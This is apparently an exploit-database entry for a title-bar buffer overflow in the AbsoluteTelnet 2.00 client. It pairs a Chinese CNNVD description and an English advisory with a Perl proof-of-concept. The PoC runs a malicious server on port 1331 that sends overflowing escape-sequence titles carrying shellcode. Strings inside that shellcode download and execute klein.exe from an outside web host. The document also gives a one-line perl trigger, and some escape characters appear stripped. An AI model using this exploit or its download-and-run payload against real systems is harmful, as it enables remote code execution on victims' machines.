https://www.exploit-db.com/exploits/22229
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200302-001

AbsoluteTelnet是一款终端客户程序，支持多种协议包括Telnet、SSH1、SSH2等，可使用在Win32平台下。AbsoluteTelnet对超长标题栏缺少正确边界检查，本地或者远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以进程用户权限在系统上执行任意指令。当设置程序标题栏(titlebar)过长时，AbsoluteTelnet运行时可覆盖堆栈返回地址，如：exportKNUD=`perl-e’print”A”x296’`echo-ne”33]0;$KNUD07″用户可以诱使目标用户’cat’一个文件来执行这个攻击。当AbsoluteTelnet设置为”defaulttelnetclient”时，构建包含如下Metarefresh的网页，可以触发此类问题：.

source: http://www.securityfocus.com/bid/6785/info

A buffer overflow vulnerability was reported for AbsoluteTelnet. The vulnerability exists due to insufficient bounds checking performed when setting the title bar of the client. 

An attacker can exploit this vulnerability by enticing a victim user to view a website with malicious HTML tags. This will cause the buffer overflow condition. Code execution may be possible.

#!/usr/bin/perl
#UK2-SEC presents..
#absolute telnet 2.00 buffer overflow
#proof of concept code
#based on [email protected] advisory
#thanx knud..
#
#Coded by:
#deadbeat
#[email protected]
#
#UK2-SEC...
use IO::Socket;
$user = "new";
$pass = "iamnew";
$shellcode = 
"xF0x00x00x00x58x55x89xE5x81xECx2Cx00x00x00x89x45xD4xC7x45xFC".
"x00x00xE6x77x8Bx45xFCx66x81x38x4Dx5Ax75x7Cx05x3Cx00x00x00x8B".
"x18x03x5DxFCx66x81x3Bx50x45x75x6Bx81xC3x78x00x00x00x8Bx33x03".
"x75xFCx81xC6x18x00x00x00xADx89x45xF4xADx03x45xFCx89x45xF0xAD".
"x03x45xFCx89x45xECxADx03x45xFCx89x45xE8x31xFFx8Bx45xD4x05x0F".
"x00x00x00x89x45xDCxC7x45xD8x0Dx00x00x00xE8x2Dx00x00x00x8Bx55".
"xDCx89x55xE0x8Bx45xD4x89x45xDCxC7x45xD8x0Fx00x00x00xE8x15x00".
"x00x00x8Bx55xDCx89x55xE4x8Bx45xE0x89xD3xE9x77x00x00x00xE9xF6".
"x00x00x00x31xC0x89x45xF8x8Bx7DxF8x3Bx7DxF4x7Dx43x47x89x7DxF8".
"x31xC0x8Bx45xF8xC1xE0x02x8Bx5DxECx01xC3x8Bx03x03x45xFCx89xC7".
"x8Bx75xDCx8Bx4DxD8xF3xA6x75xD6x31xC0x8Bx45xF8xD1xE0x8Bx5DxE8".
"x01xC3x31xC0x66x8Bx03xC1xE0x02x8Bx5DxF0x01xD8x8Bx18x03x5DxFC".
"x89x5DxDCxC3xE8x0BxFFxFFxFFx47x65x74x50x72x6Fx63x41x64x64x72".
"x65x73x73x00x4Cx6Fx61x64x4Cx69x62x72x61x72x79x41x00xE9x82x00".
"x00x00x5Fx55x89xE5x81xECx1Cx00x00x00x89x45xE8x89x5DxE4x89x7D".
"xFCxC7x45xECx06x00x00x00x8Bx45xFCx89x45xF4x05x46x00x00x00x89".
"x45xF0xE8x27x00x00x00xC7x45xECx03x00x00x00x8Bx45xFCx05x4Cx00".
"x00x00x89x45xF4x05x3Cx00x00x00x89x45xF0xE8x08x00x00x00x8Bx45".
"xFCxE9xCBx00x00x00x8Bx45xF4x50xFFx55xE8x85xC0x74x20x89x45xF8".
"x8Bx75xF0x8Bx4DxECx8Bx5DxF4x31xC0xACx01xC3x8Bx45xF8x60x53x50".
"xFFx55xE4x89x03x61xE2xEAxC3x90xEBxFDxE8x79xFFxFFxFFx6Bx65x72".
"x6Ex65x6Cx33x32x2Ex64x6Cx6Cx00x56x69x72x74x75x61x6Cx41x6Cx6C".
"x6Fx63x00x5Fx6Cx63x72x65x61x74x00x5Fx6Cx77x72x69x74x65x00x5F".
"x6Cx63x6Cx6Fx73x65x00x57x69x6Ex45x78x65x63x00x45x78x69x74x50".
"x72x6Fx63x65x73x73x00x0Dx1Ax22x2Ax32x3Ax77x69x6Ex69x6Ex65x74".
"x2Ex64x6Cx6Cx00x49x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex41x00x49".
"x6Ex74x65x72x6Ex65x74x4Fx70x65x6Ex55x72x6Cx41x00x49x6Ex74x65".
"x72x6Ex65x74x52x65x61x64x46x69x6Cx65x00x0Cx1Ax2Bx90x31xC0x50".
"x8Bx8Ex6Ax00x00x00xFFx51x3AxE9xE9x00x00x00x5Ex89x86x6Ax00x00".
"x00x68x04x00x00x00x68x00x10x00x00x68x9Fx86x01x00x68x00x00x00".
"x00x8Bx8Ex6Ax00x00x00xFFx51x0Dx89x86x00x00x00x00x31xC0x50x50".
"x50x50x50x8Bx8Ex6Ax00x00x00xFFx51x58x89x86x04x00x00x00x31xC0".
"x50x50x50x50x8Dx86x08x00x00x00x50x8Bx86x04x00x00x00x50x8Bx8E".
"x6Ax00x00x00xFFx51x66x89x86x04x00x00x00x8Dx86x62x00x00x00x50".
"x68x9Fx86x01x00x8Bx86x00x00x00x00x50x8Bx86x04x00x00x00x50x8B".
"x8Ex6Ax00x00x00xFFx51x77x68x00x00x00x00x8Dx86x58x00x00x00x50".
"x8Bx8Ex6Ax00x00x00xFFx51x1Ax89x86x66x00x00x00x8Bx86x62x00x00".
"x00x50x8Bx86x00x00x00x00x50x8Bx86x66x00x00x00x50x8Bx8Ex6Ax00".
"x00x00xFFx51x22x8Bx86x66x00x00x00x50x8Bx8Ex6Ax00x00x00xFFx51".
"x2Ax68x05x00x00x00x8Dx86x58x00x00x00x50x8Bx8Ex6Ax00x00x00xFF".
"x51x32xE9x06xFFxFFxFFxE8x12xFFxFFxFFx00x00x00x00x00x00x00x00".
"x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex64x65x6Cx69x6Bx6Fx6Ex2Ex64".
"x65x2Fx6Bx6Cx65x69x6Ex2Ex65x78x65x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x6Bx6Cx65x69x6Ex2Ex65x78x65x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x90";
$shell_len = length($shellcode);
print "Length of shellcode is: $shell_lenn";
$buf = "x00" x 261;
$buf .= $shellcode;
print "nUK2-SEC presents..n";
print "absolutetelnet 2.00 buffer overflown";
print "Should start POC on port:1331n";
$server =IO::Socket::INET->new
(
   LocalPort => 1331,
   Type => SOCK_STREAM,
   Reuse => 1,
   Listen => 5
) or die "Couldn't open POC server...n";
while ($client = $server->accept()) {
   print $client "Welcome to localhost.localdomainn";
   print $client "login using the password:iamnewn";
   sleep 2;
   print $client "nnPassword: ";
   $passcheck = <$client>;
   unless($passcheck = $pass){
     print $client "nnWrong password..n";
     close $server;
   }
   print $client"nnUser verfied..n";
   print $client "33]0$buf07";
}
close $server;

来源:US-CERTVulnerabilityNote:VU#666073
名称:VU#666073
链接:http://www.kb.cert.org/vuls/id/666073
来源:XF
名称:absolutetelnet-title-bar-bo(11265)
链接:http://xforce.iss.net/xforce/xfdb/11265
来源:BID
名称:6785
链接:http://www.securityfocus.com/bid/6785
来源:BUGTRAQ
名称:20030206AbsoluteTelnet2.00bufferoverflow.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=104454984001076&w;=2
来源:OSVDB
名称:16024
链接:http://www.osvdb.org/16024